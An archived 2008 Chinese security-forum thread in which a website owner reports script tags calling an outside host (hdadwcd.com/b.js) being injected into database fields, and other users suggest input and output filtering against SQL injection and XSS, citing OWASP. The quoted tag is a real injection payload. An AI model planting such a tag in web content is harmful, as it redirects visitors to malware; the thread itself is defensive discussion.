資安論壇 • 檢視主題 - 最近網頁常被值入https://www.hdadwcd.com/b.js

檢視沒有回覆的主題 | 檢視最近討論的主題

討論區首頁 » 資安工具, 系統討論區 » 防駭工具討論版

所有顯示的時間為 UTC + 8 小時

最近網頁常被值入https://www.hdadwcd.com/b.js

版主: Roy1103

第 1 頁 (共 1 頁)

[ 6 篇文章 ]

列印模式	上一個主題 \| 下一個主題

發表人

內容

shichou

文章主題 : 最近網頁常被值入https://www.hdadwcd.com/b.js

發表於 : 2008年 7月 3日, 11:43

註冊時間: 2008年 7月 3日, 11:37
文章: 2

最近很多網頁被值入＜script src=https://www.hdadwcd.com/b.js＞＜/script＞到資料庫裡，資料庫還原完不久，又會被竄改其他欄位，被改到不知如何是好，各位先進，有人研究出來如何防制嗎？求就求救！

回頂端

zq886

文章主題 :

發表於 : 2008年 7月 3日, 12:32

註冊時間: 2007年 1月 2日, 11:21
文章: 62

是網頁還是資料庫？兩個是有差異的。

先檢查你的程式，不然再怎麼還原都沒用。

回頂端

shichou

文章主題 :

發表於 : 2008年 7月 3日, 13:32

註冊時間: 2008年 7月 3日, 11:37
文章: 2

是透過網頁來改資料庫的資料，比如說，在產品名稱後面加上<script src=https://www.xxx.com/b.js></script>這一串URL，其中XXX有時候會是重複名稱，有時候名成又是別的名稱，被改到很煩。

回頂端

zq886

文章主題 :

發表於 : 2008年 7月 3日, 13:36

註冊時間: 2007年 1月 2日, 11:21
文章: 62

檢查程式，在接收資料的時候，應該先過濾格式。

回頂端

rockflow

文章主題 :

發表於 : 2008年 7月 5日, 21:04

註冊時間: 2007年 7月 22日, 22:52
文章: 1

這是最近比較嚴重的SQL Injection手法!其目的是讓瀏覽您網頁的人在不知情的情況下redirect到指定的惡意網站,下載惡意程式....您的網站變成轉介者

回頂端

remarklin

文章主題 :

發表於 : 2008年 7月 7日, 08:39

註冊時間: 2007年 12月 17日, 17:34
文章: 99

rockflow 寫:

這是最近比較嚴重的SQL Injection手法!其目的是讓瀏覽您網頁的人在不知情的情況下redirect到指定的惡意網站,下載惡意程式....您的網站變成轉介者

看哪個語法搞不好只是XSS而已....用SQL Injetion應該不會這麼小家子氣只在
某欄位給你搞這個外站script....XSS防禦是不建議只在輸入的地方檢查，比較理想
的部份是要輸出檔案或db load出的欄位時也過濾一下，把特別的字元給換掉
(輸入或輸出修正還要看你程式的需要....有的地方輸入就可以作，有的可能輸出再作
比較合適....自己考慮清楚)
可以參考OWSAP建議過濾的字元:https://www.owasp.org/index.php/XSS#How_to_Protect_Yourself

回頂端

第 1 頁 (共 1 頁)

[ 6 篇文章 ]

討論區首頁 » 資安工具, 系統討論區 » 防駭工具討論版

所有顯示的時間為 UTC + 8 小時

誰在線上

正在瀏覽這個版面的使用者：沒有註冊會員和 1 位訪客

您不能在這個版面發表主題
您不能在這個版面回覆主題
您不能在這個版面編輯您的文章
您不能在這個版面刪除您的文章

前往 :